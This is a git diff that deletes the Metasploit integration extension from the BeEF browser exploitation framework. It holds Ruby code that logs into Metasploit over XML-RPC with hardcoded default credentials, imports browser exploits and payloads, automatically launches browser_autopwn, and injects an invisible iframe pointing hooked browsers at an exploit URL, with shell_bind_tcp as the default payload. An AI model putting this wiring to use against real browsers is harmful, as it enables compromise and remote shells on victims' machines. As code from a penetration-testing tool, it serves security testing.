diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
deleted file mode 100644
index e246c8e36..000000000
--- a/extensions/metasploit/config.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-# Enable MSF by changing extension:metasploit:enable to true
-# Then set msf_callback_host to be the public IP of your MSF server
-#
-# Ensure you load the xmlrpc interface in Metasploit
-# msf > load xmlrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
-# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
-beef:
- extension:
- metasploit:
- name: 'Metasploit'
- enable: true
- host: "127.0.0.1"
- url-path: "/RPC2"
- port: 55553
- user: "msf"
- pass: "abc123"
- callback_host: "192.168.84.1"
- autopwn_url: "autopwn"
diff --git a/extensions/metasploit/dbmigration.rb b/extensions/metasploit/dbmigration.rb
deleted file mode 100644
index c00a13979..000000000
--- a/extensions/metasploit/dbmigration.rb
+++ /dev/null
@@ -1,96 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-module BeEF
-module Extension
-module Metasploit
-
- module DbMigration
-
- extend BeEF::API::Migration
-
- def self.migrate_commands
- msf = BeEF::Extension::Metasploit::RpcClient.instance
-
- # verify that metasploit is enabled and we are logged in.
- if(msf.is_enabled && msf.login())
- Thread.new() {
- begin
- sploits = msf.browser_exploits()
- sploits.each do |sploit|
- if not BeEF::Core::Models::CommandModule.first(:name => sploit)
- mod = BeEF::Core::Models::CommandModule.new(:path => "Dynamic/Msf", :name => sploit)
- mod.save
- if mod.dynamic_command_info == nil
- msfi = msf.get_exploit_info(sploit)
- st = sploit.split('/').first
- targets = []
-
- os_name = BeEF::Core::Constants::Os::match_os(st)
-
- browsers = BeEF::Core::Constants::Browsers::match_browser(msfi['name'] + msfi['targets'].to_json)
- targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' =>
- BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0
-
- browsers.each do |bn|
- targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' =>
- BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
- }
- end
-
- targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING}
-
- msfci = BeEF::Core::Models::DynamicCommandInfo.new(
- :name => msfi['name'],
- :description => msfi['description'],
- :targets => targets.to_json)
-
- mod.dynamic_command_info = msfci
- mod.save
- end
- end
- end
-
- payloads = msf.payloads()
- payloads.each do |payload|
- if not BeEF::Core::Models::DynamicPayloads.first( :name => payload)
- pl = BeEF::Core::Models::DynamicPayloads.new( :name => payload)
- pl.save
- opts = msf.payload_options(payload)
- opts.keys.each do |opt|
- next if opts[opt]['advanced'] or opts[opt]['evasion']
- pl.dynamic_payload_info.new(:name => opt, :description => opts[opt]['desc'], :required => opts[opt]['required'], :value => opts[opt]['default'])
- end
- pl.save
- end
- end
-
- # Catching and printing exceptions in regards to migration
- # of Metasploit exploits into BeEF
- rescue Exception => e
- puts e.message
- puts e.backtrace
- end
- msf.launch_autopwn()
-
- }#thread end
- end
- end
-
- end
-
-end
-end
-end
diff --git a/extensions/metasploit/extension.rb b/extensions/metasploit/extension.rb
deleted file mode 100644
index 4db03c885..000000000
--- a/extensions/metasploit/extension.rb
+++ /dev/null
@@ -1,33 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-module BeEF
-module Extension
-module Metasploit
-
- extend BeEF::API::Extension
-
- @short_name = @full_name = 'metasploit'
-
- @description = 'use metasploit exploits with beef'
-
-end
-end
-end
-
-require 'extensions/metasploit/filters'
-require 'extensions/metasploit/rpcclient'
-require 'extensions/metasploit/msfcommand'
-require 'extensions/metasploit/dbmigration'
diff --git a/extensions/metasploit/filters.rb b/extensions/metasploit/filters.rb
deleted file mode 100644
index 6c3d900f7..000000000
--- a/extensions/metasploit/filters.rb
+++ /dev/null
@@ -1,28 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-#
-# We extend the default filters to include the filters for Metasploit
-#
-module BeEF
-module Filters
-
- def self.is_valid_msf_payload_name?(name)
- return false if only?("a-z_/", name)
- true
- end
-
-end
-end
\ No newline at end of file
diff --git a/extensions/metasploit/msfcommand.rb b/extensions/metasploit/msfcommand.rb
deleted file mode 100644
index 3ae64ff34..000000000
--- a/extensions/metasploit/msfcommand.rb
+++ /dev/null
@@ -1,228 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-module BeEF
-module Modules
-module Commands
-
- class Msf < BeEF::Core::Command
-
- def initialize
- h = {
- 'name' => 'Generic Metasploit Exploit',
- 'description' => 'This module will launch a Metasploit exploit against the host',
- 'category' => 'Metasploit',
- 'author' => ['sussurro']
- }
-
- BeEF::Core::Configuration.instance.set('beef.module.gmsf', h)
- super('gmsf')
- end
-
- def callback
- save({'result' => @datastore['result']})
- end
-
- #
- def update_info(id)
- mod = BeEF::Core::Models::CommandModule.first(:id => id)
- msfinfo = nil
- targets = []
-
- if mod.dynamic_command_info == nil
- msf = BeEF::Extension::Metasploit::RpcClient.instance
- msf.login()
- msfinfo = msf.get_exploit_info(mod.name)
-
- st = mod.name.split('/').first
- puts "st: " + st
-
- os_name = BeEF::Core::Constants::Os::match_os(st)
-
- browsers = BeEF::Core::Constants::Browsers::match_browser(msfinfo['name'] + msfinfo['targets'].to_json)
-
- targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' =>
- BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0
-
- browsers.each do |bn|
- targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' =>
- BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
- }
- end
-
- targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING}
-
- mod.dynamic_command_info = BeEF::Core::Models::DynamicCommandInfo.new(
- :name => msfinfo['name'],
- :description => msfinfo['description'],
- :targets => targets.to_json)
- mod.save
- else
- msfinfo = mod.dynamic_command_info
- targets = JSON.parse(msfinfo['targets'])
- end
-
- @info['Name'] = msfinfo['name']
- @info['Description'] = msfinfo['description']
- @info['MsfModName'] = mod.name
- @info['mod-id'] = mod.id
- @info['msfid'] = mod.name
- @target = targets
- end
-
- def update_data()
- modname = @info['MsfModName']
-
- msf = BeEF::Extension::Metasploit::RpcClient.instance
- if not msf.is_enabled
- @info['Description'] += "
" + "*"*15 + "WARNING" + "*"*15 + "
"
- @info['Description'] += "Metasploit capapbilities have been disabled, please verify your configuration or if msf_enabled = 1 then check the BeEF console for errors"
- return
- end
-
- msfoptions = msf.get_options(modname)
-
- msfoptions.keys.each { |k|
- next if msfoptions[k]['advanced'] == true
- next if msfoptions[k]['evasion'] == true
-
- @info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => msfoptions[k]['desc']}
-
- case msfoptions[k]['type']
- when "string","address","port"
- msfoptions[k]['default'] = rand(32**20).to_s(32) if k == "URIPATH"
- @info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || msfoptions[k]['default'])}
- when "bool"
- @info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k }
- when "enum"
- enumdata = []
- msfoptions[k]['enums'].each { |e|
- enumdata << [e]
- }
- @info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => enumdata, 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || msfoptions[k]['default'])}
- end
- }
-
- msfpayloads = msf.get_payloads(modname)
-
- return if not msfpayloads or not msfpayloads['payloads']
-
- payloads = msfpayloads['payloads']
-
- pl = []
- pl << [(oc_value('PAYLOAD') || 'generic/shell_bind_tcp')]
-
- payloads.each { |p|
- pl << [p]
- }
-
- @info['Data'] << { 'name' => 'PAYLOAD',
- 'type' => 'combobox',
- 'anchor' => '95% -100',
- 'ui_label' => 'Payload',
- 'store_type' => 'arraystore',
- 'store_fields' => ['payload'],
- 'store_data' => pl,
- 'valueField' => 'payload',
- 'displayField' => 'payload' ,
- 'autoWidth' => true,
- 'mode' => 'local',
- 'reloadOnChange' => true, # reload payloads
- 'defaultPayload' => "generic/shell_bind_tcp", # default combobox value
- 'emptyText' => "select a payload..."
- }
-
- @info['Data'] << { 'name' => 'mod_id' , 'id' => 'mod_id', 'type' => 'hidden', 'value' => @info['mod-id'] }
- end
-
- def get_payload_options(payload_name)
- # get payload options from metasploit
- msf_xmlrpc_clinet = BeEF::Extension::Metasploit::RpcClient.instance
- msf_xmlrpc_clinet.login()
- payload_options = msf_xmlrpc_clinet.payload_options(payload_name)
-
- info = {}
- info['Data'] = []
-
- payload_options.keys.each { |k|
- next if payload_options[k]['advanced'] == true
- next if payload_options[k]['evasion'] == true
- info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => payload_options[k]['desc']}
- case payload_options[k]['type']
- when "string","address","port","raw","path", "integer"
- payload_options[k]['default'] = "127.0.0.1" if k == "RHOST"
- info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || payload_options[k]['default'])}
- when "bool"
- info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k }
- when "enum"
- info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => payload_options[k]['enums'], 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || payload_options[k]['default'])}
- else
- # Debug output if the payload option type isn't found
- puts "K => #{k}\n"
- puts "Status => #{payload_options[k]['advanced']}\n"
- puts "Type => #{payload_options[k]['type']}\n"
- puts payload_options[k]
- end
- }
-
- # turn results into JSON
- payload_options_json = []
- payload_options_json[1] = JSON.parse(info.to_json)
-
- JSON.parse(info.to_json)
-
- end
-
- def launch_exploit(opts)
- msf = BeEF::Extension::Metasploit::RpcClient.instance
- msf.login()
- ret = msf.launch_exploit(@info['msfid'],opts)
- @output = "\n" if ret['result'] == 'success'
- ret
- end
-
- def output
- if @datastore
- @datastore['command_url'] = BeEF::Core::Server.instance.get_command_url(@default_command_url)
- @datastore['command_id'] = @command_id
- end
-
- return "
-beef.execute(function() {
- var result;
-
- try {
- var sploit = beef.dom.createInvisibleIframe();
- sploit.src = '#{datastore['sploit_url']}';
- } catch(e) {
- for(var n in e)
- result+= n + ' ' + e[n] ;
- }
-
-});"
- end
-
- def callback
- content = {}
- content['Exploit Results'] = @datastore['result']
- save content
- end
- end
-
-end
-end
-end
-
-
diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb
deleted file mode 100644
index 04f4a6d21..000000000
--- a/extensions/metasploit/rpcclient.rb
+++ /dev/null
@@ -1,230 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-module BeEF
-module Extension
-module Metasploit
-
- #
- # XML RPC Client for Metasploit
- #
- class RpcClient < ::XMLRPC::Client
-
- include Singleton
-
- def initialize
- @config = BeEF::Core::Configuration.instance
- @enabled = (@config.get('beef.extension.metasploit.enable'))
-
- return if (not @enabled)
-
- host = @config.get('beef.extension.metasploit.host')
- path = @config.get('beef.extension.metasploit.url-path')
- port = @config.get('beef.extension.metasploit.port')
- @un = @config.get('beef.extension.metasploit.user')
- @pw = @config.get('beef.extension.metasploit.pass')
- @apurl = @config.get('beef.extension.metasploit.autopwn_url') || "autopwn"
- @lock = false
-
- if(not host or not path or not port or not @un or not @pw)
- print_error 'There is not enough information to initalize Metasploit connectivity at this time'
- print_error 'Please check your options in config.yaml to verify that all information is present'
- @enabled = false
- end
-
- @token = nil
- @lastauth = nil
-
- super(host,path,port)
- end
-
- def get_lock()
- sleep 0.2 while @lock
- @lock = true
- end
-
- def release_lock()
- @lock = false
- end
-
- # is metasploit enabled in the configuration
- def is_enabled
- @enabled
- end
-
- # login into metasploit
- def login
- get_lock()
- res = self.call("auth.login", @un ,@pw )
-
- if(not (res and res['result'] == "success"))
- @enabled = false
- release_lock()
- print_error 'Could not authenticate to Metasploit xmlrpc.'
- return false
- end
-
- print_info 'Successful connection with Metasploit.' if not @lastauth
-
- @token = res['token']
- @lastauth = Time.now
-
- release_lock()
- true
- end
-
- # sends commands to the metasploit xml rpc server
- def call(meth, *args)
- return if not @enabled
-
- if(meth != "auth.login")
- self.login() if not @token
- args.unshift(@token)
- end
-
- begin
- super(meth, *args)
- rescue Errno::ECONNREFUSED
- print_error "Connection to Metasploit backend failed."
- @enabled = false
- return false
- rescue XMLRPC::FaultException => e
- if e.faultCode == 401 and meth == "auth.login"
- print_error "Your username and password combination was rejected by the Metasploit backend server"
- @enabled = false
- elsif e.faultCode == 401
- res = self.login()
- else
- print_error "An unknown exception has occured while talking to the Metasploit backend."
- print_error "The Exception text is (#{e.faultCode} : #{e.faultString}."
- print_error "Please check the Metasploit logs for more details."
- end
- return false
- rescue Exception => e
- print_error "An unknown exception (#{e}) has occured while talking to the Metasploit backend."
- print_error "Please check the Metasploit logs for more details."
- return false
- end
- end
-
- def browser_exploits()
- return if not @enabled
-
- get_lock()
- res = self.call('module.exploits')
- return [] if not res or not res['modules']
-
- mods = res['modules']
- ret = []
-
- mods.each do |m|
- ret << m if(m.include? '/browser/')
- end
-
- release_lock()
- ret.sort
- end
-
- def get_exploit_info(name)
- return if not @enabled
- get_lock()
- res = self.call('module.info','exploit',name)
- release_lock()
- res || {}
- end
-
- def get_payloads(name)
- return if not @enabled
- get_lock()
- res = self.call('module.compatible_payloads',name)
- release_lock()
- res || {}
- end
-
- def get_options(name)
- return if not @enabled
- get_lock()
- res = self.call('module.options','exploit',name)
- release_lock()
- res || {}
- end
-
- def payloads()
- return if not @enabled
- get_lock()
- res = self.call('module.payloads')
- release_lock()
- return {} if not res or not res['modules']
- res['modules']
- end
-
- def payload_options(name)
- return if not @enabled
- get_lock()
- res = self.call('module.options','payload',name)
- release_lock
- return {} if not res
- res
- end
-
- def launch_exploit(exploit,opts)
- return if not @enabled
- get_lock()
- begin
- res = self.call('module.execute','exploit',exploit,opts)
- rescue Exception => e
- print_error "Exploit failed for #{exploit} \n"
- release_lock()
- return false
- end
-
- release_lock()
-
- uri = ""
- if opts['SSL']
- uri += "https://"
- else
- uri += "http://"
- end
-
- uri += @config.get('beef.extension.metasploit.callback_host') + ":" + opts['SRVPORT'] + "/" + opts['URIPATH']
-
- res['uri'] = uri
- res
- end
-
- def launch_autopwn
- return if not @enabled
- opts = {
- 'LHOST' => @config.get('beef.extension.metasploit.callback_host') ,
- 'URIPATH' => @apurl
- }
- get_lock()
- begin
- res = self.call('module.execute','auxiliary','server/browser_autopwn',opts)
- rescue Exception => e
- print_error "Failed to launch autopwn\n"
- release_lock()
- return false
- end
- release_lock()
-
- end
-
- end
-
-end
-end
-end